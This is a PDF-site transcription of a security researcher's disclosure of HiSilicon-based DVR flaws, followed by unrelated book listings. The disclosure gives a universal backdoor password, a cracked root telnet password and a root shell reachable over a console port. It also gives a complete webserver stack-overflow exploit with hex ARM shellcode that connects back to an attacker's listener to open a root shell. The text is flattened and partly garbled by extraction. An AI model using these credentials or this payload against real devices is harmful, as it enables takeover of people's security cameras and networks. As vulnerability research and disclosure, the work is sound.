Hisilicon Dvr Hack Exploit Db Com-Books Pdf

HiSilicon DVR hack exploit db com
10 Feb 2020 | 30 views | 0 downloads | 24 Pages | 1.07 MB

Share Pdf : Hisilicon Dvr Hack Exploit Db Com

Download and Preview : Hisilicon Dvr Hack Exploit Db Com


Report CopyRight/DMCA Form For : Hisilicon Dvr Hack Exploit Db Com



Transcription

exploring the DVR 1,the DVR at a first glance 1,obtaining the firmware 3. service scanning 3,root shell 4,telnet interface 5. firmware reversing 5,remote gdb 6,inspect the authentication procedure 7. password hash function 8,buffer overflow in builtin webserver 8. program flow control 9,remote code execution 10,RCE without ASLR 11.
defeating ASLR 14,post exploitation 17,summary 20, This report discloses serious vulnerabilities with proof of concept PoC. code of DVR NVR devices built using the HiSilicon hi3520d and similar system on. a chip SoC Exploiting the vulnerabilities lead to unauthorized remote code. execution RCE using only the web interface causing full takeover of the exploited. device Due to lack of upgraded firmwares using these devices is not. recommended Contacted the vendor before Dec 2016 but still no response The. release date of the disclosure is Feb 2017, Couple of years ago I have bought a cheap Chinese DVR device on eBay The boot logo of the device. says SECULINK Security Monitoring As an IT security enthusiast I decided to have a closer look. of the device to see how secure that security monitoring service is Googling about the topic I have. found some interesting materials but digged deeper and found much more interesting and much. more serious issues 0 days about the device, Let us have a look at the full hacking session from the beginning The new own achievements will. be noted as the old known ones as well,exploring the DVR. First we should learn the official user interface then dig deeper maybe try to obtain the firmware. The chances to find vulnerabilities increase with the firmware. the DVR at a first glance, The DVR device intented for testing is branded as Seculink.
Available physical interfaces, 2x USB ports officially for mouse to control the GUI console. HDMI port and VGA for attaching external monitor for GUI camera views. 4x BNC connectors for analogoue CCTV cameras, SATA port inside for attaching storage for recording the video stream. Ethernet port for network access,Official user interfaces. direct access using the HDMI or VGA as output and USB mouse keyboard for input for camera. view control full setup, network access through HTTP for camera view control. The directly accessible setup interface is restricted by user authentication username password. Default superuser is admin default password is blank. After setting up a strong password the user may feel safe that his her camera view is not accessible. by others People often forward the web port tcp 80 of the DVR device to the WAN side from their. secure LAN in order to access the DVR streams from outside we may check this e g by a suitable. Shodan search,obtaining the firmware,There may be lot of ways for getting the firmware.
get it from the device by some soft method using the official interface or exploiting some. vulnerability, get it from the device by some hard method JTAG serial console etc. find and download it from the internet if it is available. Although the latter download method is working here and it is the easiest let us try the first one. because it gives other information about the device too. service scanning, Let us do a full port scan on the DVR Note that the default if run by root SYN scan is very slow. because dropped packets but the full TCP connect scan finishes in a couple of minutes. Nmap 7 40 scan initiated Sun Sep 3 01 57 47 2017 as nmap v sV sT p oA. nmap full 192 168 88 127,Nmap scan report for dvr lan 192 168 88 127. Host is up 0 028s latency,Not shown 65529 closed ports. PORT STATE SERVICE VERSION,23 tcp open telnet BusyBox telnetd.
80 tcp open http uc httpd 1 0 0,554 tcp open rtsp LuxVision or Vacron DVR rtspd. 9527 tcp open unknown,34567 tcp open dhanalakshmi,34599 tcp open unknown. MAC Address 00 12 12 15 B3 E7 Plus,Service Info Host LocalHost Device webcam. Nmap done at Sun Sep 3 02 00 42 2017 1 IP address 1 host up scanned in 174 79. Summarizing and manual testing, 23 tcp is a telnet login interface protected by some username password not the application. credentials, 80 tcp is the web interface protected by the application credentials.
554 tcp is an rtsp service it can be opened by a common rtsp url. rtsp 192 168 88 127 554 user admin password channel 1 stream 0 sdp. Note that opening the rtsp stream requires credentials as well. 9527 tcp seems to be a secret service port with some very interesting features. 34567 tcp and 34599 tcp seem to be some data ports related to the DVR application. Here we should state that the device is probably some Linux like system. Connecting to 9527 tcp by raw netcat shows the application console with logging messages and a. login prompt Logging in with any of the defined application credentials is working Issuing help. after the prompt gives a short description of the console commands The command shell seems to. be the most interesting Yes it gives a root shell to the devices. Note that this is obviously a serious security issue because any low privileged application user. should not get a root shell on the device automatically. root shell, Exploring the device in the root shell e g by dmesg makes it obvious that the DVR is running a. Linux kernel version 3 0 8 it has an ARMv7 CPU the SoC model is hi3520d. From the list of running processes ps it is clear that the DVR application is var Sofia which is. listening on 34568 udp and 34569 udp as well besides the above tcp ports detected by nmap. netstat nlup, From the list of mounted disks mount command it is clear that the firmware image is in the. dev mtdblockX devices where X 0 1 2 3 4 5, The firmware is small and therefore restricted so we should be creative if we want to copy files. to from the device Fortunately NFS is supported so setting up an NFS server on our desktop. machine and mounting it from the DVR solves the problem. mount t nfs 192 168 88 100 nfs home o nolock,Now obtaining the firmware is straightforward. cat dev mtdblock1 home mtdblock1 root img,cat dev mtdblock2 home mtdblock2 usr img.
cat dev mtdblock3 home mtdblock3 custom img,cat dev mtdblock4 home mtdblock4 logo img. cat dev mtdblock5 home mtdblock5 mtd img,We may get the files not just the raw images. cp var Sofia home, tar cf home fs tar bin boot etc lib linuxrc mnt opt root sbin share slv. telnet interface, For accessing the device through the telnet interface port 23 tcp we may need some OS. credentials Looking at etc passwd we have the password hash for the root user. root absxcfbgXtb3o 0 0 root bin sh, Note that there is no other user than root everything is running with full privileges So if someone.
breaks into the device somehow there is no barrier the attacker gains full power immediately. Assuming a six char alphanum lowercase password hashcat cracks the above weak DES hash. hashcat64 bin a3 m1500 absxcfbgXtb3o 1 l d 1 1 1 1 1 1. absxcfbgXtb3o xc3511,Session hashcat,Status Cracked. Hash Type descrypt DES Unix Traditional DES,Hash Target absxcfbgXtb3o. Time Started Sun Sep 3 03 25 07 2017 2 mins 29 secs. Time Estimated Sun Sep 3 03 27 36 2017 0 secs,Guess Mask 1 1 1 1 1 1 6. Guess Charset 1 l d 2 Undefined 3 Undefined 4 Undefined. Guess Queue 1 1 100 00,Speed Dev 1 815 9 kH s 203 13ms. Recovered 1 1 100 00 Digests 1 1 100 00 Salts,Progress 121360384 2176782336 5 58.
Rejected 0 121360384 0 00,Restore Point 93440 1679616 5 56. Candidates 1 sa8711 h86ani,HWMon Dev 1 N A,Started Sun Sep 3 03 25 04 2017. Stopped Sun Sep 3 03 27 38 2017, So with user root and password xc3511 logging in throught the telnet interface on port 23 tcp is. possible This hard coded root account accessible on the unclosable telnet interface is obviously a. These results were almost available by others before our research but the following is completely. firmware reversing, Exploring the firmware it turns out that the binary var Sofia is the main application which. implements every interface besides video processing and others So this binary seems to be the. most interesting for us, Unfortunately it is statically linked and stripped which makes static analysis harder.
file Sofia, Sofia ELF 32 bit LSB executable ARM EABI5 version 1 SYSV statically linked. stripped with debug info, So besides static analyis with radare2 or IDA dynamic analysis should be very helpful. remote gdb, For dynamic analysis attaching GNU Project debugger GDB to the remote var Sofia application. should be advantageous The recommended method is to run and attach gdbserver on the remote. device and connect gdb to it from the local machine. Of course we need a gdbserver compiled preferably statically for the appropriate ARM. architecture In order to build it we may use Clibc which is the recommended C library for. embedded systems like our DVR Available builds are dynamic builds which are problematic on. our DVR so we should make custom static builds ourselves There is a nice build environment. called Buildroot which makes building work out of the box select the required apps e g gdb with. make menuconfig do not forget to choose static libraries then run make. After a short build time 10 15 mins all the necessary tools should be available The static binaries. can be transferred to the device by the previously mentioned NFS method Note that the directory. var containing the Sofia binary is a ramfs so it is not persistent across reboots If we want to. transfer the binaries almost permanently the rw partition mnt mtd containing the configuration. files should be a suitable target If you build the package openssh too scp will be available which. makes transferring files more easier, Now the firmware is ready for some reversing Attaching gdbserver remotely is working now. getting the PID of the Sofia process is easy by ps. mnt mtd gdbserver attach 2000 610,Connecting from the local machine.
gdb ex set gnutarget elf32 littlearm ex target remote 192 168 88 127 2000. Note that using some GDB extension like GEF is recommended If pausing the application does not. work with C c for some reason sending a TRAP signal to the Sofia process by kill TRAP 610. should pause it,inspect the authentication procedure. The recommended tool for static analysis is obviously Hex Ray s IDA Pro Unfortunately it is not. cheap but much better than any other tools, There are 15 000 functions after initial auto analysis but finding the auth function is just a. moment with IDA using simple Python scripting The IDAPython snippet below searches for all. functions that references to anything related to Users and Password at the same time. x1 x2 set set,for loc name in Names,if Users in name. for addr in XrefsTo loc,x1 add GetFunctionName addr frm. elif Password in name,for addr in XrefsTo loc,x2 add GetFunctionName addr frm.
print x1 x2, The result is only one function sub 2D857C Quick analysis of this function confirms that this should. be the authentication function, There is an initial check on the cleartext password against a hardcoded string before getting the. password hash of the user from the config If it passes authentication is granted This is an ugly. backdoor in the application The universal password is I0TO5Wv9. With this password we can access anything in the application as any user e g admin For example. getting the video stream, cvlc rtsp 192 168 88 127 554 user admin password I0TO5Wv9 channel 1 stream 0 sdp. Or getting a root shell on the application console 9527 tcp is also working. nc 192 168 88 127 9527,nc using stream socket,username admin. password I0TO5Wv9,login admin Console address, One more interesting result in the authentication algorithm in some circumstances the auth.
function accepts not just the password but the hash also Opening the rtsp video stream is possible. by not just the password but the hash which is stored in mnt mtd Config Account1 For example. tlJwpbo6 is the hash of the empty password see next section too so. cvlc rtsp 192 168 88 127 554 user admin password channel 1 stream 0 sdp. cvlc rtsp 192 168 88 127 554 user admin password tlJwpbo6 channel 1 stream 0 sdp. also works,password hash function, Another result of the auth function deeper static analysis the password hash function is. sub 3DD5E4 It is basically MD5 with some strange transformations Reversed and implemented it in. import hashlib,def sofia hash msg,m hashlib md5,m update msg. msg md5 m digest,for i in range 8,n ord msg md5 2 i ord msg md5 2 i 1 0x3e. With the implemented hash algorithm brute forcing passwords or setting arbitrary passwords is. buffer overflow in builtin webserver, The Sofia binary handles the HTTP requests on port 80 tcp Let us try some fuzzing with the. requests Of course attaching gdb see above should be helpful Actually we should kill the Sofia. process and restart it with gdbserver to see the console output as well. mnt mtd gdbserver 2000 var Sofia,And locally, gdb q ex set gnutarget elf32 littlearm ex target remote 192 168 88 127 2000.
Now let us see the GET requests No response,echo GET nc 192 168 88 127 80. Normal response even without proper closing and or newline at the end. echo ne GET HTTP nc 192 168 88 127 80,Test for some overflow with a looong request. python c print GET a 1000 HTTP nc 192 168 88 127 80. Nice The response is a 200 with a 404 File Not Found message but we can see a wonderful crash. in the gdb, Note that there is a watchdog kernel module enabled for the Sofia application If it is not running. for a minute the device reboots This is good on the one hand if we experiment with a remote. device but it is bad on the other if we want to do some debugging smoothly. The watchdog can not be turned off once it has been started so the only way to get rid of it is to. modify the read only firmware by reflashing It is not recommended unless we want to brick our. test device,program flow control, Why is the crash wonderful in an attacker s view The remote process Sofia got SIGSEGV. segmentation fault the stack is filled up with our a characters but the most important is the pc. program counter register has our injected value 0x61616160 aaaa 1 in it probably triggered by. a ret but the cause is not important This should be a classical stack overflow and this means that. we have the chance to control the program flow easily. After some experimenting by interval halving,python c print GET 0123 a 299 4 wxyz HTTP nc.
192 168 88 127 80, This results SIGSEGV too and the pc register is 0x7a797876 wxyz reversed because byte. ordering is little endian and 1 because alignment Our payload starts with 0123aaa at. sp 0x14 stack base 0x14,remote code execution, Exploiting such an overflow most easily and effectively is by injecting some shellcode into the stack. and redirect the program flow there This way we get arbitrary remote code execution on the. target Because there is no privilege separation on the device OS this means full control root shell. However there may be modern exploit mitigation techniques enabled which could make an. attacker s life much harder, The most basic way protecting against shellcodes on stack is the No eXecute NX bit technology. This can prevent executing code on selected memory pages usually pages with write permission. like stack Fortunately from the view of the attacker there is no NX bit set look at STACK flags. objdump b elf32 littlearm p Sofia,Sofia file format elf32 littlearm. Program Header, 0x70000001 off 0x00523f34 vaddr 0x0052bf34 paddr 0x0052bf34 align 2 2.
filesz 0x000132a8 memsz 0x000132a8 flags r, LOAD off 0x00000000 vaddr 0x00008000 paddr 0x00008000 align 2 15. filesz 0x005371dc memsz 0x005371dc flags r x, LOAD off 0x005371dc vaddr 0x005471dc paddr 0x005471dc align 2 15. filesz 0x000089c8 memsz 0x000dad8c flags rw, TLS off 0x005371dc vaddr 0x005471dc paddr 0x005471dc align 2 2. filesz 0x00000004 memsz 0x00000018 flags r, STACK off 0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2 2. filesz 0x00000000 memsz 0x00000000 flags rwx, private flags 5000002 Version5 EABI Unrecognised flag bits set.
or just use checksec in gdb gef checksec in gdb gef also tells us that there is no other mitigations. present such as stack canary which is obvious because we could not control pc with stack. overflow if there would be stack canary present, The only thing we should know before getting the RCE work is the stack address We should inject. address sp 0x14 in the appropriate position of our payload wxyz above in order to redirect. program flow to the shellcode, There is also a mitigation technique which could make this harder or very hard almost impossible. in some cases address space layout randomization ASLR ASLR randomizes the base addresses of. the memory segments e g the base address of the stack. Out of luck ASLR is enabled 2 means full randomization 0 is disabled. cat proc sys kernel randomize va space,RCE without ASLR. Let us try to exploit the overflow first with ASLR turned off. echo 0 proc sys kernel randomize va space, Following the above procedure we get that the stack address sp is 0x5a26f3d8 at the time of the. SIGSEGV crash and it is the same in different runs with ASLR turned off. So the payload should be, python c print GET shellcode a 299 len shellcode xd8 xf3 x26 x5a.
HTTP nc 192 168 88 127 80, where the shellcode should be something we want to execute preferably a connectback shellcode. Note that there are badchars which must be avoided 0x00 0x0d n 0x20 0x26 0x3f. Moreover there is a 299 byte size limit Shellcode generators can not deal with our badchar. list even using automated encoders can not solve the problem because of the size limit. So a custom shellcode should be generated The shellcode here gives a connectback shell using. socket connect dup2 and execve system calls or supervisor calls according to the terminology of. the ARM world We have to be strict and creative in order to avoid badchars Labels should not be. used those are just for easier readability,section text. global start, ensure switching to thumb mode arm mode instructions. 0 add r1 pc 1,thumb mode instructions, 0x52 1 port 0x100 make it possible to use port numbers 1024. 8 add r1 pc 68 r1 pc 68 0xc 68 0x50,a ldrb r2 r1 2 r2 0x52.
c sub r2 1 r2 r2 1,e strb r2 r1 2 r2 0x52,socket 2 1 0 socket AF INET SOCK DGRAM 0. 10 mov r1 2 r1 2,12 add r0 r1 0 r0 r1 0 2,14 mov r1 1 r1 1. 16 sub r2 r2 r2 r2 r2 r2 0,18 lsl r7 r1 8 r7 r1 8 1 8 256. 1a add r7 25 r7 r7 25 281,1c svc 1 r0 svc 281 r0 r1 r2 socket 2 1 0. connect r0 0x50 16 connect socket struct addr addr len. 1e add r6 r0 0 r6 r0 0 socket,20 add r1 pc 44 r1 pc 44 0x24 44 0x50.
22 mov r3 2 r3 2,24 strh r3 r1 0 2 0x50,26 mov r2 16 r2 16. 28 add r7 2 r7 r7 2 283, 2a svc 1 r0 svc 283 r0 r1 r2 connect socket 0x50 16. attach stdin stdout stderr to socket dup2 r0 0 dup2 r0 1 dup2 r0 2. 2c mov r7 62 r7 62,2e add r7 1 r7 r7 1 63,30 mov r1 200 r1 200. 32 add r0 r6 0 r0 r6 0 socket,34 svc 1 r0 svc 63 r0 r1 dup2 socket 0 200. 36 sub r1 1 r1 r1 1, 38 bpl 32 loop until r1 0 dup2 every fd to the socket.
execve bin sh NULL NULL,3a add r0 pc 28 r0 pc 28 0x3c 28 0x58. 3c sub r2 r2 r2 r2 r2 r2 0, 3e strb r2 r0 7 0 0x58 7 terminate bin sh with x00. 40 push r0 r2 sp r0 r1 r2 0x58 0x0 0x0,42 mov r1 sp r1 sp. 44 mov r7 11 r7 11,46 svc 1 svc 11 r0 r1 r2 execve bin sh x00 bin sh. 48 mov r7 1 r7 1,4a add r0 r7 0 r0 r7 0 1,4c svc 1 svc 1 r0 exit 1.
struct sockaddr sa family 0x0002 set by shellcode sa data port ip. 50 short 0xffff, 52 short 0x697b port 31377 hex 31337 0x100 in little endian. 54 byte 192 168 88 100 inet addr 192 168 88 100, 58 ascii bin shX X will be replaced with x00 by the shellcode. word 0xefbeadde deadbeef, Compiling the shellcode and getting the raw binary bytes using any cross tool for ARM should. work e g the ones built using buildroot in buildroot 2017 02 5 output host usr bin is good too. armv7a hardfloat linux gnueabi as shellcode S o shellcode o. armv7a hardfloat linux gnueabi ld bfd shellcode o o shellcode. armv7a hardfloat linux gnueabi objcopy O binary only section text shellcode. shellcode bin,cat shellcode bin xxd p, 01108fe211ff2fe111a18a78013a8a700221081c0121921a0f02193701df. 061c0ba102230b801022023701df3e270137c821301c01df0139fbd507a0. 921ac27105b469460b2701df0127381c01dfc046ffff7b69c0a858642f62. 696e2f736858deadbeef, Injecting this with the payload should make the exploit work and it should give a connectback shell.
to the remote device, Of course first start a listener on 192 168 88 100. nc nvlp 31337,Then start up the payload,python c shellcode. 01108fe211ff2fe111a18a78013a8a700221081c0121921a0f02193701df061c0ba102230b80102202370. 1df3e270137c821301c01df0139fbd507a0921ac27105b469460b2701df0127381c01dfc046ffff7b69c0a. 858642f62696e2f736858deadbeef decode hex print GET shellcode a 299. len shellcode xec xf3 x26 x5a HTTP nc 192 168 88 127 80. nc using stream socket,HTTP 1 0 200 OK,Content type application binary. Server uc httpd 1 0 0,html head title 404 File Not Found title head. body The requested URL was not found on this server body html. Exploit should work In the local gdb,process 1064 is executing new program bin busybox.
Reading bin busybox from remote target,Reading bin busybox from remote target. And the RCE is ready on the netcat listener, nc connect to 192 168 88 100 31337 from 192 168 88 127 55442. nc using stream socket, Now executing arbitraty commands as root on the remote system is possible.


Related Books

Bowen Family Systems Theory and Practice: Illustration and ...

Bowen Family Systems Theory and Practice Illustration and

same time he used his concepts to guide his intervention in a minor emotional crisis in his own extended family, an intervention which he describes as a spectacular breakthrough for him in theory and practice (Bowen, 1972 in Bowen, 1978). In 1967, he surprised a national family therapy conference by talking about his own family

BAB II TINJAUAN UMUM 2.1. TINJAUAN TRANSPORTASI UMUM DARAT

BAB II TINJAUAN UMUM 2 1 TINJAUAN TRANSPORTASI UMUM DARAT

Transportasi darat dapat di klasifikasikan menjadi: 1. Geografis Fisik, terdiri dari moda transportasi jalan rel, moda ... Di Indonesia, kereta rel listrik

10 Easy Songs On Guitar

10 Easy Songs On Guitar

10 Easy Songs On Guitar Looking for easy songs on guitar? Heres a list of tracks that are perfect for absolute beginners. Lets dive in! In this Ultimate Guide you will learn: 10 easy guitar songs for beginners (well walk you through each one) The 5 essential chords a beginner guitarist must know (they [re super-easy) 73 easy songs on guitar that you can play with those 5 chords

Studi Potensi Bisnis dan Pelaku Utama Industri ANGKUTAN ...

Studi Potensi Bisnis dan Pelaku Utama Industri ANGKUTAN

PETA BISNIS TRANSPORTASI LAUT DI DALAM NEGERI, ... Perkembangan Pelabuhan/Terminal di Indonesia ... Pelabuhan Laut Utama di Indonesia ...

NURSING GUIDELINES ON THE CARE OF INFANTS WITH ...

NURSING GUIDELINES ON THE CARE OF INFANTS WITH

1 NURSING GUIDELINES ON THE CARE OF INFANTS WITH THERMOREGULATION INSTABILITY 3RD EDITION Version Number 3 Date of Issue July 2017 Reference Number NGCITI3-07-2017-EMETJMC-V3 Review Interval 3 yearly Approved By

KONSEP PERGERAKAN TRANSPORTASI DI KOTA SURABAYA - ATPW

KONSEP PERGERAKAN TRANSPORTASI DI KOTA SURABAYA ATPW

KONSEP PERGERAKAN TRANSPORTASI DI ... pembangunan ekonomi dan perkembangan ... pemabgian jalur seperti ini sudah dilakukan di berbagai kota di Indonesia ...

KAJIAN EVALUASI PEMBANGUNAN BIDANG TRANSPORTASI DI INDONESIA

KAJIAN EVALUASI PEMBANGUNAN BIDANG TRANSPORTASI DI INDONESIA

Berdasarkan riset yang dilakukan oleh Lembaga Manajemen FEUI terhadap perkembangan kontribusi transportasi terhadap ... Bidang Transportasi di Indonesia ...

Selection and Construction of a RF-modulated Laser Diode ...

Selection and Construction of a RF modulated Laser Diode

HL7851G 785.00 50.00 9.0 45 Single Mode . Note: If you already have a mount for the laser diode, make sure your mount supports the packing and pin configuration of the selected laser diode. Although many laser diodes can be modulated, it is always advisable to check the specification of the laser diode to verify it can be modulated. Usually the ...

Cybersecurity Partnerships - The Center on Law and Security

Cybersecurity Partnerships The Center on Law and Security

CYBERSECURITY PARTNERSHIPS: A NEW ERA OF PUBLIC-PRIVATE COLLABORATION 3 unfettered access to, and possibly ceding control of, their private computer systems ...

WINTER 18 EXAMINATION Subject Name: Microprocessor and ...

WINTER 18 EXAMINATION Subject Name Microprocessor and

Answers Marking Scheme 1 (A) Attempt any SIX of the following: 12- Total Marks (a) List any four salient features of 8085 microprocessor. 2M Ans: (Any four) Features of 8085: 1. 16 address line so 216=64 Kbytes of memory can be addressed. 2. Operating clock frequency is 3MHz and minimum clock frequency is 500 KHz. 3. On chip bus controller. 4 ...